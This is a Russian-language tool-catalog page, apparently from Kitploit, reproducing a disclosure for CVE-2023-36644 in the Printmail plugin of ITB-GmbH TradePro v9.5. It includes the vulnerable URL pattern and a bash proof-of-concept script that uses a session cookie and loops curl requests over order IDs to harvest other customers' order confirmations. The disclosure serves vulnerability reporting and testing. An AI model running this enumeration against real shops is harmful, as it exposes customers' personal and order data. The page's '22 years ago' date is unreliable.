Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-36644 — Эксплойт proof-of-concept для CVE-2023-36644, демонстрирующий удаленное раскрытие информации из-за некорректного контроля доступа в плагине Printmail ITB-GmbH TradePro v9.5. Включает bash-скрипт для перебора подтверждений заказов. | Kitploit
Инструменты/GitHubGitHub/caffeinated-labs/cve-2023-36644
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubcaffeinated-labs/cve-2023-36644

CVE-2023-36644

Эксплойт proof-of-concept для CVE-2023-36644, демонстрирующий удаленное раскрытие информации из-за некорректного контроля доступа в плагине Printmail ITB-GmbH TradePro v9.5. Включает bash-скрипт для перебора подтверждений заказов.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт
22 лет назадЕщё не проверено

== Затронутое программное обеспечение [%hardbreaks] Вендор: ITB-GmbH Затронутые продукты: TradePro (v9.5) Компонент: Printmail Plugin Подтверждено: да

== Вектор атаки [%hardbreaks] Тип: Некорректный контроль доступа Тип доступа: Удаленный Воздействие: Раскрытие информации

Некорректный контроль доступа в плагине printmail в ITB-GmbH TradePro v9.5 позволяет удаленным злоумышленникам получать все подтверждения заказов из интернет-магазина, передавая произвольные номера заказов на http(s) конечную точку.

== Описание Параметр orderid должен быть известен заранее, но может быть легко перебран или получен через SQLi (см. Отчет link:/security/CVE-2023-36645[CVE-2023-36645])

Вызов http(s)://[DOMAIN]/shop/de/?plugin=printmail&wkid=[COOKIE]&orderid=[ORDER_ID] с действительным, но неаутентифицированным сессионным куки дает злоумышленнику доступ ко всем подтверждениям заказов.

== CVSS [%hardbreaks] Оценка: 7.1 Вектор: https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P[CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P]

== PoC [source, bash]

#! /bin/bash DOMAIN=$1 TEST_PATH="shop/de/sys/" #TEST_PATH="shop/de/" SAMPLE1_ID=0

COOKIE=$(curl -s -c - $DOMAIN | grep sessiontradepro | cut -f7) echo "Got Cookie: $COOKIE" SAMPLE1=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE1_ID" | grep size_download | cut -d" " -f2) echo Test URL: "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=%ID%" echo "========" echo $SAMPLE1_ID $SAMPLE1 for SAMPLE2_ID in {24000..25000} do SAMPLE2=$(curl -s -w '\nsize_download %{size_download}' "$DOMAIN/$TEST_PATH?plugin=printmail&wkid=$COOKIE&orderid=$SAMPLE2_ID" | grep size_download | cut -d" " -f2) echo $SAMPLE2_ID $SAMPLE2 done

== Авторы

  • Lynn
  • Jadyn
  • https://zerforschung.org[zerforschung.org]
Скачать инструмент